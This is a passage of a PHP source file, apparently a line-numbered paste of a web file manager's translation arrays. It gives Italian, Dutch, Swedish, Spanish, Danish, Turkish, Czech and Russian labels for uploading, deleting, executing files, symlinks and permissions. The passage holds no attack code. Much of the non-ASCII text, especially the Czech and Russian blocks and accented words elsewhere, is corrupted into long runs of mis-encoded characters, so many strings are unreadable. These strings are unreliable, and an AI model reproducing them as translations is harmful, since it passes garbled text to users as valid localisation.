  1818. 'copy_files' => 'Copio questi file',
  1819. 'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
  1820. 'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]",
  1821. 'not_edited' => '"[%1]" non pu����¯�¿�½������² essere modificato.',
  1822. 'executed' => "\"[%1]\" ����¯�¿�½������¨ stato eseguito con successo:\n{%2}",
  1823. 'not_executed' => "\"[%1]\" non ����¯�¿�½������¨ stato eseguito con successo\n{%2}",
  1824. 'saved' => '"[%1]" ����¯�¿�½������¨ stato salvato.',
  1825. 'not_saved' => '"[%1]" non ����¯�¿�½������¨ stato salvato.',
  1826. 'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" ����¯�¿�½������¨ stato creato.',
  1827. 'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non ����¯�¿�½������¨ stato creato.',
  1828. 'permission_for' => 'Permessi di "[%1]":',
  1829. 'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].',
  1830. 'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].',
  1831. 'not_readable' => '"[%1]" non pu����¯�¿�½������² essere letto.'
  1832.         );
  1833.  
  1834.     case 'nl':
  1835.  
  1836.         $date_format = 'n/j/y H:i:s';
  1837.         $word_charset = 'ISO-8859-1';
  1838.  
  1839.         return array(
  1840. 'directory' => 'Directory',
  1841. 'file' => 'Bestand',
  1842. 'filename' => 'Bestandsnaam',
  1843.  
  1844. 'size' => 'Grootte',
  1845. 'permission' => 'Bevoegdheid',
  1846. 'owner' => 'Eigenaar',
  1847. 'group' => 'Groep',
  1848. 'other' => 'Anderen',
  1849. 'functions' => 'Functies',
  1850.  
  1851. 'read' => 'lezen',
  1852. 'write' => 'schrijven',
  1853. 'execute' => 'uitvoeren',
  1854.  
  1855. 'create_symlink' => 'maak symlink',
  1856. 'delete' => 'verwijderen',
  1857. 'rename' => 'hernoemen',
  1858. 'move' => 'verplaatsen',
  1859. 'copy' => 'kopieren',
  1860. 'edit' => 'bewerken',
  1861. 'download' => 'downloaden',
  1862. 'upload' => 'uploaden',
  1863. 'create' => 'aanmaken',
  1864. 'change' => 'veranderen',
  1865. 'save' => 'opslaan',
  1866. 'set' => 'instellen',
  1867. 'reset' => 'resetten',
  1868. 'relative' => 'Relatief pat naar doel',
  1869.  
  1870. 'yes' => 'Ja',
  1871. 'no' => 'Nee',
  1872. 'back' => 'terug',
  1873. 'destination' => 'Bestemming',
  1874. 'symlink' => 'Symlink',
  1875. 'no_output' => 'geen output',
  1876.  
  1877. 'user' => 'Gebruiker',
  1878. 'password' => 'Wachtwoord',
  1879. 'add' => 'toevoegen',
  1880. 'add_basic_auth' => 'add basic-authentification',
  1881.  
  1882. 'uploaded' => '"[%1]" is verstuurd.',
  1883. 'not_uploaded' => '"[%1]" kan niet worden verstuurd.',
  1884. 'already_exists' => '"[%1]" bestaat al.',
  1885. 'created' => '"[%1]" is aangemaakt.',
  1886. 'not_created' => '"[%1]" kan niet worden aangemaakt.',
  1887. 'really_delete' => 'Deze bestanden verwijderen?',
  1888. 'deleted' => "Deze bestanden zijn verwijderd:\n[%1]",
  1889. 'not_deleted' => "Deze bestanden konden niet worden verwijderd:\n[%1]",
  1890. 'rename_file' => 'Bestandsnaam veranderen:',
  1891. 'renamed' => '"[%1]" heet nu "[%2]".',
  1892. 'not_renamed' => '"[%1] kon niet worden veranderd in "[%2]".',
  1893. 'move_files' => 'Verplaats deze bestanden:',
  1894. 'moved' => "Deze bestanden zijn verplaatst naar \"[%2]\":\n[%1]",
  1895. 'not_moved' => "Kan deze bestanden niet verplaatsen naar \"[%2]\":\n[%1]",
  1896. 'copy_files' => 'Kopieer deze bestanden:',
  1897. 'copied' => "Deze bestanden zijn gekopieerd naar \"[%2]\":\n[%1]",
  1898. 'not_copied' => "Deze bestanden kunnen niet worden gekopieerd naar \"[%2]\":\n[%1]",
  1899. 'not_edited' => '"[%1]" kan niet worden bewerkt.',
  1900. 'executed' => "\"[%1]\" is met succes uitgevoerd:\n{%2}",
  1901. 'not_executed' => "\"[%1]\" is niet goed uitgevoerd:\n{%2}",
  1902. 'saved' => '"[%1]" is opgeslagen.',
  1903. 'not_saved' => '"[%1]" is niet opgeslagen.',
  1904. 'symlinked' => 'Symlink van "[%2]" naar "[%1]" is aangemaakt.',
  1905. 'not_symlinked' => 'Symlink van "[%2]" naar "[%1]" is niet aangemaakt.',
  1906. 'permission_for' => 'Bevoegdheid voor "[%1]":',
  1907. 'permission_set' => 'Bevoegdheid van "[%1]" is ingesteld op [%2].',
  1908. 'permission_not_set' => 'Bevoegdheid van "[%1]" is niet ingesteld op [%2].',
  1909. 'not_readable' => '"[%1]" kan niet worden gelezen.'
  1910.         );
  1911.  
  1912.     case 'se':
  1913.  
  1914.         $date_format = 'n/j/y H:i:s';
  1915.         $word_charset = 'ISO-8859-1';
  1916.  
  1917.         return array(
  1918. 'directory' => 'Mapp',
  1919. 'file' => 'Fil',
  1920. 'filename' => 'Filnamn',
  1921.  
  1922. 'size' => 'Storlek',
  1923. 'permission' => 'S����¯�¿�½������¤kerhetsniv����¯�¿�½������¥',
  1924. 'owner' => '����¯�¿�½���¯���¿���½gare',
  1925. 'group' => 'Grupp',
  1926. 'other' => 'Andra',
  1927. 'functions' => 'Funktioner',
  1928.  
  1929. 'read' => 'L����¯�¿�½������¤s',
  1930. 'write' => 'Skriv',
  1931. 'execute' => 'Utf����¯�¿�½������¶r',
  1932.  
  1933. 'create_symlink' => 'Skapa symlink',
  1934. 'delete' => 'Radera',
  1935. 'rename' => 'Byt namn',
  1936. 'move' => 'Flytta',
  1937. 'copy' => 'Kopiera',
  1938. 'edit' => '����¯�¿�½���¯���¿���½ndra',
  1939. 'download' => 'Ladda ner',
  1940. 'upload' => 'Ladda upp',
  1941. 'create' => 'Skapa',
  1942. 'change' => '����¯�¿�½���¯���¿���½ndra',
  1943. 'save' => 'Spara',
  1944. 'set' => 'Markera',
  1945. 'reset' => 'T����¯�¿�½������¶m',
  1946. 'relative' => 'Relative path to target',
  1947.  
  1948. 'yes' => 'Ja',
  1949. 'no' => 'Nej',
  1950. 'back' => 'Tillbaks',
  1951. 'destination' => 'Destination',
  1952. 'symlink' => 'Symlink',
  1953. 'no_output' => 'no output',
  1954.  
  1955. 'user' => 'Anv����¯�¿�½������¤ndare',
  1956. 'password' => 'L����¯�¿�½������¶senord',
  1957. 'add' => 'L����¯�¿�½������¤gg till',
  1958. 'add_basic_auth' => 'add basic-authentification',
  1959.  
  1960. 'uploaded' => '"[%1]" har laddats upp.',
  1961. 'not_uploaded' => '"[%1]" kunde inte laddas upp.',
  1962. 'already_exists' => '"[%1]" finns redan.',
  1963. 'created' => '"[%1]" har skapats.',
  1964. 'not_created' => '"[%1]" kunde inte skapas.',
  1965. 'really_delete' => 'Radera dessa filer?',
  1966. 'deleted' => "De h����¯�¿�½������¤r filerna har raderats:\n[%1]",
  1967. 'not_deleted' => "Dessa filer kunde inte raderas:\n[%1]",
  1968. 'rename_file' => 'Byt namn p����¯�¿�½������¥ fil:',
  1969. 'renamed' => '"[%1]" har bytt namn till "[%2]".',
  1970. 'not_renamed' => '"[%1] kunde inte d����¯�¿�½������¶pas om till "[%2]".',
  1971. 'move_files' => 'Flytta dessa filer:',
  1972. 'moved' => "Dessa filer har flyttats till \"[%2]\":\n[%1]",
  1973. 'not_moved' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]",
  1974. 'copy_files' => 'Kopiera dessa filer:',
  1975. 'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]",
  1976. 'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]",
  1977. 'not_edited' => '"[%1]" kan inte ����¯�¿�½������¤ndras.',
  1978. 'executed' => "\"[%1]\" har utf����¯�¿�½������¶rts:\n{%2}",
  1979. 'not_executed' => "\"[%1]\" kunde inte utf����¯�¿�½������¶ras:\n{%2}",
  1980. 'saved' => '"[%1]" har sparats.',
  1981. 'not_saved' => '"[%1]" kunde inte sparas.',
  1982. 'symlinked' => 'Symlink fr����¯�¿�½������¥n "[%2]" till "[%1]" har skapats.',
  1983. 'not_symlinked' => 'Symlink fr����¯�¿�½������¥n "[%2]" till "[%1]" kunde inte skapas.',
  1984. 'permission_for' => 'R����¯�¿�½������¤ttigheter f����¯�¿�½������¶r "[%1]":',
  1985. 'permission_set' => 'R����¯�¿�½������¤ttigheter f����¯�¿�½������¶r "[%1]" ����¯�¿�½������¤ndrades till [%2].',
  1986. 'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
  1987. 'not_readable' => '"[%1]" kan inte l����¯�¿�½������¤sas.'
  1988.         );
  1989.  
  1990.     case 'es':
  1991.  
  1992.         $date_format = 'j/n/y H:i:s';
  1993.         $word_charset = 'ISO-8859-1';
  1994.  
  1995.         return array(
  1996. 'directory' => 'Directorio',
  1997. 'file' => 'Archivo',
  1998. 'filename' => 'Nombre Archivo',
  1999.  
  2000. 'size' => 'Tama����¯�¿�½������±o',
  2001. 'permission' => 'Permisos',
  2002. 'owner' => 'Propietario',
  2003. 'group' => 'Grupo',
  2004. 'other' => 'Otros',
  2005. 'functions' => 'Funciones',
  2006.  
  2007. 'read' => 'lectura',
  2008. 'write' => 'escritura',
  2009. 'execute' => 'ejecuci����¯�¿�½������³n',
  2010.  
  2011. 'create_symlink' => 'crear enlace',
  2012. 'delete' => 'borrar',
  2013. 'rename' => 'renombrar',
  2014. 'move' => 'mover',
  2015. 'copy' => 'copiar',
  2016. 'edit' => 'editar',
  2017. 'download' => 'bajar',
  2018. 'upload' => 'subir',
  2019. 'create' => 'crear',
  2020. 'change' => 'cambiar',
  2021. 'save' => 'salvar',
  2022. 'set' => 'setear',
  2023. 'reset' => 'resetear',
  2024. 'relative' => 'Path relativo',
  2025.  
  2026. 'yes' => 'Si',
  2027. 'no' => 'No',
  2028. 'back' => 'atr����¯�¿�½������¡s',
  2029. 'destination' => 'Destino',
  2030. 'symlink' => 'Enlace',
  2031. 'no_output' => 'sin salida',
  2032.  
  2033. 'user' => 'Usuario',
  2034. 'password' => 'Clave',
  2035. 'add' => 'agregar',
  2036. 'add_basic_auth' => 'agregar autentificaci����¯�¿�½������³n b����¯�¿�½������¡sica',
  2037.  
  2038. 'uploaded' => '"[%1]" ha sido subido.',
  2039. 'not_uploaded' => '"[%1]" no pudo ser subido.',
  2040. 'already_exists' => '"[%1]" ya existe.',
  2041. 'created' => '"[%1]" ha sido creado.',
  2042. 'not_created' => '"[%1]" no pudo ser creado.',
  2043. 'really_delete' => '����¯�¿�½������¿Borra estos archivos?',
  2044. 'deleted' => "Estos archivos han sido borrados:\n[%1]",
  2045. 'not_deleted' => "Estos archivos no pudieron ser borrados:\n[%1]",
  2046. 'rename_file' => 'Renombra archivo:',
  2047. 'renamed' => '"[%1]" ha sido renombrado a "[%2]".',
  2048. 'not_renamed' => '"[%1] no pudo ser renombrado a "[%2]".',
  2049. 'move_files' => 'Mover estos archivos:',
  2050. 'moved' => "Estos archivos han sido movidos a \"[%2]\":\n[%1]",
  2051. 'not_moved' => "Estos archivos no pudieron ser movidos a \"[%2]\":\n[%1]",
  2052. 'copy_files' => 'Copiar estos archivos:',
  2053. 'copied' => "Estos archivos han sido copiados a  \"[%2]\":\n[%1]",
  2054. 'not_copied' => "Estos archivos no pudieron ser copiados \"[%2]\":\n[%1]",
  2055. 'not_edited' => '"[%1]" no pudo ser editado.',
  2056. 'executed' => "\"[%1]\" ha sido ejecutado correctamente:\n{%2}",
  2057. 'not_executed' => "\"[%1]\" no pudo ser ejecutado correctamente:\n{%2}",
  2058. 'saved' => '"[%1]" ha sido salvado.',
  2059. 'not_saved' => '"[%1]" no pudo ser salvado.',
  2060. 'symlinked' => 'Enlace desde "[%2]" a "[%1]" ha sido creado.',
  2061. 'not_symlinked' => 'Enlace desde "[%2]" a "[%1]" no pudo ser creado.',
  2062. 'permission_for' => 'Permisos de "[%1]":',
  2063. 'permission_set' => 'Permisos de "[%1]" fueron seteados a [%2].',
  2064. 'permission_not_set' => 'Permisos de "[%1]" no pudo ser seteado a [%2].',
  2065. 'not_readable' => '"[%1]" no pudo ser le����¯�¿�½������­do.'
  2066.         );
  2067.  
  2068.     case 'dk':
  2069.  
  2070.         $date_format = 'n/j/y H:i:s';
  2071.         $word_charset = 'ISO-8859-1';
  2072.  
  2073.         return array(
  2074. 'directory' => 'Mappe',
  2075. 'file' => 'Fil',
  2076. 'filename' => 'Filnavn',
  2077.  
  2078. 'size' => 'St����¯�¿�½������¸rrelse',
  2079. 'permission' => 'Rettighed',
  2080. 'owner' => 'Ejer',
  2081. 'group' => 'Gruppe',
  2082. 'other' => 'Andre',
  2083. 'functions' => 'Funktioner',
  2084.  
  2085. 'read' => 'l����¯�¿�½������¦s',
  2086. 'write' => 'skriv',
  2087. 'execute' => 'k����¯�¿�½������¸r',
  2088.  
  2089. 'create_symlink' => 'opret symbolsk link',
  2090. 'delete' => 'slet',
  2091. 'rename' => 'omd����¯�¿�½������¸b',
  2092. 'move' => 'flyt',
  2093. 'copy' => 'kopier',
  2094. 'edit' => 'rediger',
  2095. 'download' => 'download',
  2096. 'upload' => 'upload',
  2097. 'create' => 'opret',
  2098. 'change' => 'skift',
  2099. 'save' => 'gem',
  2100. 'set' => 's����¯�¿�½������¦t',
  2101. 'reset' => 'nulstil',
  2102. 'relative' => 'Relativ sti til valg',
  2103.  
  2104. 'yes' => 'Ja',
  2105. 'no' => 'Nej',
  2106. 'back' => 'tilbage',
  2107. 'destination' => 'Distination',
  2108. 'symlink' => 'Symbolsk link',
  2109. 'no_output' => 'ingen resultat',
  2110.  
  2111. 'user' => 'Bruger',
  2112. 'password' => 'Kodeord',
  2113. 'add' => 'tilf����¯�¿�½������¸j',
  2114. 'add_basic_auth' => 'tilf����¯�¿�½������¸j grundliggende rettigheder',
  2115.  
  2116. 'uploaded' => '"[%1]" er blevet uploaded.',
  2117. 'not_uploaded' => '"[%1]" kunnu ikke uploades.',
  2118. 'already_exists' => '"[%1]" findes allerede.',
  2119. 'created' => '"[%1]" er blevet oprettet.',
  2120. 'not_created' => '"[%1]" kunne ikke oprettes.',
  2121. 'really_delete' => 'Slet disse filer?',
  2122. 'deleted' => "Disse filer er blevet slettet:\n[%1]",
  2123. 'not_deleted' => "Disse filer kunne ikke slettes:\n[%1]",
  2124. 'rename_file' => 'Omd����¯�¿�½������¸d fil:',
  2125. 'renamed' => '"[%1]" er blevet omd����¯�¿�½������¸bt til "[%2]".',
  2126. 'not_renamed' => '"[%1] kunne ikke omd����¯�¿�½������¸bes til "[%2]".',
  2127. 'move_files' => 'Flyt disse filer:',
  2128. 'moved' => "Disse filer er blevet flyttet til \"[%2]\":\n[%1]",
  2129. 'not_moved' => "Disse filer kunne ikke flyttes til \"[%2]\":\n[%1]",
  2130. 'copy_files' => 'Kopier disse filer:',
  2131. 'copied' => "Disse filer er kopieret til \"[%2]\":\n[%1]",
  2132. 'not_copied' => "Disse filer kunne ikke kopieres til \"[%2]\":\n[%1]",
  2133. 'not_edited' => '"[%1]" kan ikke redigeres.',
  2134. 'executed' => "\"[%1]\" er blevet k����¯�¿�½������¸rt korrekt:\n{%2}",
  2135. 'not_executed' => "\"[%1]\" kan ikke k����¯�¿�½������¸res korrekt:\n{%2}",
  2136. 'saved' => '"[%1]" er blevet gemt.',
  2137. 'not_saved' => '"[%1]" kunne ikke gemmes.',
  2138. 'symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" er blevet oprettet.',
  2139. 'not_symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" kunne ikke oprettes.',
  2140. 'permission_for' => 'Rettigheder for "[%1]":',
  2141. 'permission_set' => 'Rettigheder for "[%1]" blev sat til [%2].',
  2142. 'permission_not_set' => 'Rettigheder for "[%1]" kunne ikke s����¯�¿�½������¦ttes til [%2].',
  2143. 'not_readable' => '"[%1]" Kan ikke l����¯�¿�½������¦ses.'
  2144.         );
  2145.  
  2146.     case 'tr':
  2147.  
  2148.         $date_format = 'n/j/y H:i:s';
  2149.         $word_charset = 'ISO-8859-1';
  2150.  
  2151.         return array(
  2152. 'directory' => 'Klasor',
  2153. 'file' => 'Dosya',
  2154. 'filename' => 'dosya adi',
  2155.  
  2156. 'size' => 'boyutu',
  2157. 'permission' => 'Izin',
  2158. 'owner' => 'sahib',
  2159. 'group' => 'Grup',
  2160. 'other' => 'Digerleri',
  2161. 'functions' => 'Fonksiyonlar',
  2162.  
  2163. 'read' => 'oku',
  2164. 'write' => 'yaz',
  2165. 'execute' => 'calistir',
  2166.  
  2167. 'create_symlink' => 'yarat symlink',
  2168. 'delete' => 'sil',
  2169. 'rename' => 'ad degistir',
  2170. 'move' => 'tasi',
  2171. 'copy' => 'kopyala',
  2172. 'edit' => 'duzenle',
  2173. 'download' => 'indir',
  2174. 'upload' => 'Yukle',
  2175. 'create' => 'create',
  2176. 'change' => 'degistir',
  2177. 'save' => 'kaydet',
  2178. 'set' => 'ayar',
  2179. 'reset' => 'sifirla',
  2180. 'relative' => 'Hedef yola gore',
  2181.  
  2182. 'yes' => 'Evet',
  2183. 'no' => 'Hayir',
  2184. 'back' => 'Geri',
  2185. 'destination' => 'Hedef',
  2186. 'symlink' => 'Kisa yol',
  2187. 'no_output' => 'cikti yok',
  2188.  
  2189. 'user' => 'Kullanici',
  2190. 'password' => 'Sifre',
  2191. 'add' => 'ekle',
  2192. 'add_basic_auth' => 'ekle basit-authentification',
  2193.  
  2194. 'uploaded' => '"[%1]" yuklendi.',
  2195. 'not_uploaded' => '"[%1]" yuklenemedi.',
  2196. 'already_exists' => '"[%1]" kullanilmakta.',
  2197. 'created' => '"[%1]" olusturuldu.',
  2198. 'not_created' => '"[%1]" olusturulamadi.',
  2199. 'really_delete' => 'Bu dosyalar silinsin mi DOSTUM?',
  2200. 'deleted' => "Bu dosyalar silindi:\n[%1]",
  2201. 'not_deleted' => "Bu dosyalar silinemedi:\n[%1]",
  2202. 'rename_file' => 'Adi degisen dosya:',
  2203. 'renamed' => '"[%1]" adili dosyanin yeni adi "[%2]".',
  2204. 'not_renamed' => '"[%1] adi degistirilemedi "[%2]" ile.',
  2205. 'move_files' => 'Tasinan dosyalar:',
  2206. 'moved' => "Bu dosyalari tasidiginiz yer \"[%2]\":\n[%1]",
  2207. 'not_moved' => "Bu dosyalari tasiyamadiginiz yer \"[%2]\":\n[%1]",
  2208. 'copy_files' => 'Kopyalanan dosyalar:',
  2209. 'copied' => "Bu dosyalar kopyalandi \"[%2]\":\n[%1]",
  2210. 'not_copied' => "Bu dosyalar kopyalanamiyor \"[%2]\":\n[%1]",
  2211. 'not_edited' => '"[%1]" duzenlenemiyor.',
  2212. 'executed' => "\"[%1]\" Basariyla Calistirildi:\n{%2}",
  2213. 'not_executed' => "\"[%1]\" Calistirilamadi:\n{%2}",
  2214. 'saved' => '"[%1]" Kaydedildi.',
  2215. 'not_saved' => '"[%1]" kaydedilemedi.',
  2216. 'symlinked' => '"[%2]" den "[%1]" e kisayol olusturuldu.',
  2217. 'not_symlinked' => '"[%2]"den "[%1]" e kisayol olusturulamadi.',
  2218. 'permission_for' => 'Izinler "[%1]":',
  2219. 'permission_set' => 'Izinler "[%1]" degistirildi [%2].',
  2220. 'permission_not_set' => 'Izinler "[%1]" degistirilemedi [%2].',
  2221. 'not_readable' => '"[%1]" okunamiyor.'
  2222.         );
  2223.  
  2224.     case 'cs':
  2225.  
  2226.         $date_format = 'd.m.y H:i:s';
  2227.         $word_charset = 'UTF-8';
  2228.  
  2229.         return array(
  2230. 'directory' => 'Adres����¯�¿�½���¯���¿���½����¯�¿�½������¡����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2231. 'file' => 'Soubor',
  2232. 'filename' => 'Jm����¯�¿�½���¯���¿���½����¯�¿�½������©no souboru',
  2233.  
  2234. 'size' => 'Velikost',
  2235. 'permission' => 'Pr����¯�¿�½���¯���¿���½����¯�¿�½������¡va',
  2236. 'owner' => 'Vlastn����¯�¿�½���¯���¿���½����¯�¿�½������­k',
  2237. 'group' => 'Skupina',
  2238. 'other' => 'Ostatn����¯�¿�½���¯���¿���½����¯�¿�½������­',
  2239. 'functions' => 'Funkce',
  2240.  
  2241. 'read' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ten����¯�¿�½���¯���¿���½����¯�¿�½������­',
  2242. 'write' => 'Z����¯�¿�½���¯���¿���½����¯�¿�½������¡pis',
  2243. 'execute' => 'Spou����¯�¿�½���¯���¿���½����¯�¿�½������¡t����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½n����¯�¿�½���¯���¿���½����¯�¿�½������­',
  2244.  
  2245. 'create_symlink' => 'Vytvo����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½it symbolick����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ odkaz',
  2246. 'delete' => 'Smazat',
  2247. 'rename' => 'P����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ejmenovat',
  2248. 'move' => 'P����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½esunout',
  2249. 'copy' => 'Zkop����¯�¿�½���¯���¿���½����¯�¿�½������­rovat',
  2250. 'edit' => 'Otev����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½������­t',
  2251. 'download' => 'St����¯�¿�½���¯���¿���½����¯�¿�½������¡hnout',
  2252. 'upload' => 'Nahraj na server',
  2253. 'create' => 'Vytvo����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½it',
  2254. 'change' => 'Zm����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½nit',
  2255. 'save' => 'Ulo����¯�¿�½���¯���¿���½����¯�¿�½������¸it',
  2256. 'set' => 'Nastavit',
  2257. 'reset' => 'zp����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t',
  2258. 'relative' => 'Relatif',
  2259.  
  2260. 'yes' => 'Ano',
  2261. 'no' => 'Ne',
  2262. 'back' => 'Zp����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t',
  2263. 'destination' => 'Destination',
  2264. 'symlink' => 'Symbolick����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ odkaz',
  2265. 'no_output' => 'Pr����¯�¿�½���¯���¿���½����¯�¿�½������¡zdn����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ v����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½stup',
  2266.  
  2267. 'user' => 'U����¯�¿�½���¯���¿���½����¯�¿�½������¸ivatel',
  2268. 'password' => 'Heslo',
  2269. 'add' => 'P����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½idat',
  2270. 'add_basic_auth' => 'p����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½idej z����¯�¿�½���¯���¿���½����¯�¿�½������¡kladn����¯�¿�½���¯���¿���½����¯�¿�½������­ autentizaci',
  2271.  
  2272. 'uploaded' => 'Soubor "[%1]" byl nahr����¯�¿�½���¯���¿���½����¯�¿�½������¡n na server.',
  2273. 'not_uploaded' => 'Soubor "[%1]" nebyl nahr����¯�¿�½���¯���¿���½����¯�¿�½������¡n na server.',
  2274. 'already_exists' => 'Soubor "[%1]" u����¯�¿�½���¯���¿���½����¯�¿�½������¸ exituje.',
  2275. 'created' => 'Soubor "[%1]" byl vytvo����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½en.',
  2276. 'not_created' => 'Soubor "[%1]" nemohl bÃ?��Ã?¯Ã?¿Ã?½Ã?�Ã?¯Ã?�Ã?¿Ã?�Ã?½Ã?��Ã?¯Ã?¿Ã?½Ã?�Ã?¯Ã?�Ã?¿Ã?�Ã?½t  vytvoÃ?��Ã?¯Ã?¿Ã?½Ã?�Ã?¯Ã?�Ã?¿Ã?�Ã?½Ã?��Ã?¯Ã?¿Ã?½Ã?�Ã?¯Ã?�Ã?¿Ã?�Ã?½en.',
  2277. 'really_delete' => 'Vymazat soubor?',
  2278. 'deleted' => "Byly vymaz����¯�¿�½���¯���¿���½����¯�¿�½������¡ny tyto soubory:\n[%1]",
  2279. 'not_deleted' => "Tyto soubory nemohly b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t vytvo����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½eny:\n[%1]",
  2280. 'rename_file' => 'P����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ejmenuj soubory:',
  2281. 'renamed' => 'Soubor "[%1]" byl p����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ejmenov����¯�¿�½���¯���¿���½����¯�¿�½������¡n na "[%2]".',
  2282. 'not_renamed' => 'Soubor "[%1]" nemohl b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t p����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ejmenov����¯�¿�½���¯���¿���½����¯�¿�½������¡n na "[%2]".',
  2283. 'move_files' => 'P����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½em����¯�¿�½���¯���¿���½����¯�¿�½������­stit tyto soubory:',
  2284. 'moved' => "Tyto soubory byly p����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½em����¯�¿�½���¯���¿���½����¯�¿�½������­st����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ny do \"[%2]\":\n[%1]",
  2285. 'not_moved' => "Tyto soubory nemohly b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t p����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½em����¯�¿�½���¯���¿���½����¯�¿�½������­st����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ny do \"[%2]\":\n[%1]",
  2286. 'copy_files' => 'Zkop����¯�¿�½���¯���¿���½����¯�¿�½������­rovat tyto soubory:',
  2287. 'copied' => "Tyto soubory byly zkop����¯�¿�½���¯���¿���½����¯�¿�½������­rov����¯�¿�½���¯���¿���½����¯�¿�½������¡ny do \"[%2]\":\n[%1]",
  2288. 'not_copied' => "Tyto soubory nemohly b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t zkop����¯�¿�½���¯���¿���½����¯�¿�½������­rov����¯�¿�½���¯���¿���½����¯�¿�½������¡ny do \"[%2]\":\n[%1]",
  2289. 'not_edited' => 'Soubor "[%1]" nemohl b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t otev����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½en.',
  2290. 'executed' => "SOubor \"[%1]\" byl spu����¯�¿�½���¯���¿���½����¯�¿�½������¡t����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½n :\n{%2}",
  2291. 'not_executed' => "Soubor \"[%1]\" nemohl b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t spu����¯�¿�½���¯���¿���½����¯�¿�½������¡t����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½n:\n{%2}",
  2292. 'saved' => 'Soubor "[%1]" byl ulo����¯�¿�½���¯���¿���½����¯�¿�½������¸en.',
  2293. 'not_saved' => 'Soubor "[%1]" nemohl b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t ulo����¯�¿�½���¯���¿���½����¯�¿�½������¸en.',
  2294. 'symlinked' => 'Byl vyvo����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½en symbolick����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ odkaz "[%2]" na soubor "[%1]".',
  2295. 'not_symlinked' => 'Symbolick����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ odkaz "[%2]" na soubor "[%1]" nemohl b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t vytvo����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½en.',
  2296. 'permission_for' => 'Pr����¯�¿�½���¯���¿���½����¯�¿�½������¡va k "[%1]":',
  2297. 'permission_set' => 'Pr����¯�¿�½���¯���¿���½����¯�¿�½������¡va k "[%1]" byla zm����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½n����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½na na [%2].',
  2298. 'permission_not_set' => 'Pr����¯�¿�½���¯���¿���½����¯�¿�½������¡va k "[%1]" nemohla b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t zm����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½n����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½na na [%2].',
  2299. 'not_readable' => 'Soubor "[%1]" nen����¯�¿�½���¯���¿���½����¯�¿�½������­ mo����¯�¿�½���¯���¿���½����¯�¿�½������¸no p����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½e����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½������­st.'
  2300.         );
  2301.  
  2302.     case 'ru':
  2303.  
  2304.         $date_format = 'd.m.y H:i:s';
  2305.         $word_charset = 'KOI8-R';
  2306.        
  2307.         return array(
  2308. 'directory' => '����¯�¿�½������«����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2309. 'file' => '����¯�¿�½������¦����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2310. 'filename' => '����¯�¿�½������©����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
  2311.  
